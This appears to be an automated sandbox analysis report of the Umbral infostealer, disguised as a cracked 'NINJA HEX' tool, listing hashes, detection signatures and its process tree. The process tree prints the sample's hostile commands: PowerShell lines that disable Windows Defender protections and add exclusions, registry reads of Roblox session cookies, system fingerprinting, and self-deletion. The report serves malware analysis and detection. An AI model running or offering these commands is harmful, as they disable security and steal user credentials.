Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    15-12-2024 19:08

General

  • Target

    NINJA HEX CRAKED.exe

  • Size

    254KB

  • MD5

    6a5a18c107110aaa1b251bc168180320

  • SHA1

    4ce77f9a2af47610f8f2a254b49ae33f2958ef08

  • SHA256

    404ccd4c5dae49ea8f38a8bc283e0b488de49b04a45c3f6cfeecc3ac8162c18c

  • SHA512

    d6447e04a21a151d4625b8400a7253e59daa32ae0e027f9b6d478a9139510d7398af0338ed36b0aad7aa1321f239219c5349823d84e4c5d1a55c93b2a02c641f

  • SSDEEP

    6144:04oZo7J39KtWaV+CRB6jIx7axHUPGUphYc3YeRN66hn7DC8ej58bD:DoZA9Kd8jYPGUphYc3YeRN647k5e

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe
    "C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2312
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2020
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe"
      2⤵
      • Views/modifies file attributes
      PID:2508
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:628
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1824
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:1960
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2708
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1588
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2300
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe" && pause
          2⤵
          • Deletes itself
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2248
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1944
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        1⤵
          PID:2348

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          9d39d5b201f1393283b0091718699e45

          SHA1

          71c0ef8c0f57d94b3fdb82aaa85a8ade3fa3b382

          SHA256

          dc9ce668a4cc0040154c39c9921acb0d9e5f23f50acff23de0924217cf060a3e

          SHA512

          ef68d35187bfb53ae2145759369870b9d80a6ba98f120e88ba878389637808ff7ea4d3f61e4c218f7b20c9b916e0c58c5b51414901b8175ec1b4a361564aaeee

        • memory/1588-46-0x0000000001D90000-0x0000000001D98000-memory.dmp

          Filesize

          32KB

        • memory/2312-0-0x000007FEF5AB3000-0x000007FEF5AB4000-memory.dmp

          Filesize

          4KB

        • memory/2312-1-0x0000000000060000-0x00000000000A6000-memory.dmp

          Filesize

          280KB

        • memory/2312-2-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

          Filesize

          9.9MB

        • memory/2312-51-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

          Filesize

          9.9MB

        • memory/2460-14-0x000000001B680000-0x000000001B962000-memory.dmp

          Filesize

          2.9MB

        • memory/2460-15-0x0000000001E20000-0x0000000001E28000-memory.dmp

          Filesize

          32KB

        • memory/2840-7-0x000000001B7B0000-0x000000001BA92000-memory.dmp

          Filesize

          2.9MB

        • memory/2840-8-0x0000000001E80000-0x0000000001E88000-memory.dmp

          Filesize

          32KB